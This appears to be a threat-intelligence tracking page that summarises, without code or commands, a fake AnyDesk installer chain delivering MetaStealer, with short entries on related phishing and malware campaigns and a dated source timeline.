Fake AnyDesk installer chain using Turnstile, search-ms, and MSI-delivered MetaStealer
Technical Analysis
Summary
Hide ▲
Show ▼
A fake AnyDesk installer chain now uses Cloudflare Turnstile, Windows File Explorer, and a search-ms URI to steer victims to an attacker-controlled share and deliver MetaStealer through an MSI package disguised as Readme Anydesk.pdf. The activity increases the risk of credential theft and file theft by blending a browser lure with Windows-native prompts and masqueraded files. The delivery path remains tied to Huntress reporting and focuses on MetaStealer infection rather than a broader malware set.
Related Happenings
TCLBANKER banking trojan activity targeting 59 financial platforms
Malware Activity
First: 08.05.2026 21:12
Last: 08.05.2026 21:12
Sources 1
About this happening:
**TCLBANKER** is a newly documented **Brazilian banking trojan** that can hit **59 banking, fintech, and cryptocurrency platforms**, increasing the risk of credential theft and re...
TCLBANKER banking trojan activity targeting 59 financial platforms
Malware ActivityAbout this happening: **TCLBANKER** is a newly documented **Brazilian banking trojan** that can hit **59 banking, fintech, and cryptocurrency platforms**, increasing the risk of credential theft and re...
Vercel v0.dev phishing campaign using GenAI-built lure pages
Campaign
First: 07.05.2026 11:30
Last: 07.05.2026 11:30
Sources 1
About this happening:
A campaign using **Vercel v0.dev** to build **highly convincing phishing pages** has lowered the skill and cost needed to run fraudulent sign-in and job-lure attacks. The activity...
Vercel v0.dev phishing campaign using GenAI-built lure pages
CampaignAbout this happening: A campaign using **Vercel v0.dev** to build **highly convincing phishing pages** has lowered the skill and cost needed to run fraudulent sign-in and job-lure attacks. The activity...
Silver Fox tax-themed phishing campaign delivering ABCDoor and ValleyRAT
Campaign
First: 04.05.2026 14:57
Last: 04.05.2026 14:57
Sources 1
About this happening:
**Silver Fox** is running a **tax-themed phishing campaign** that now targets **India** with **Income Tax Department** lures and delivers **ValleyRAT (aka Winos 4.0)**. The campai...
Silver Fox tax-themed phishing campaign delivering ABCDoor and ValleyRAT
CampaignAbout this happening: **Silver Fox** is running a **tax-themed phishing campaign** that now targets **India** with **Income Tax Department** lures and delivers **ValleyRAT (aka Winos 4.0)**. The campai...
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
Campaign
First: 20.04.2026 18:01
Last: 20.04.2026 18:01
Sources 1
About this happening:
The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Formbook phishing campaign using DLL sideloading and obfuscated JavaScript
CampaignAbout this happening: The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
-
17.09.2025 17:01 3 articles · 8mo ago
Huntress reports fake AnyDesk MetaStealer chain and Cephalus incidents
Technical Analysis UpdateHuntress analysts reported increased threat activity over the past fifteen business days, including a fake AnyDesk installer that used a fake Cloudflare Turnstile lure, Windows File Explorer with a search-ms URI redirect, an attacker-controlled SMB share, and an MSI package disguised as Readme Anydesk.pdf to deploy MetaStealer. The same reporting also noted two Cephalus ransomware incidents that used DLL sideloading through SentinelBrowserNativeHost.exe from SentinelOne to launch the payload.
Show sources
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- From MostereRAT to ClickFix: New Malware Campaigns Highlight Rising AI and Phishing Risks — thehackernews.com — 09.09.2025 13:27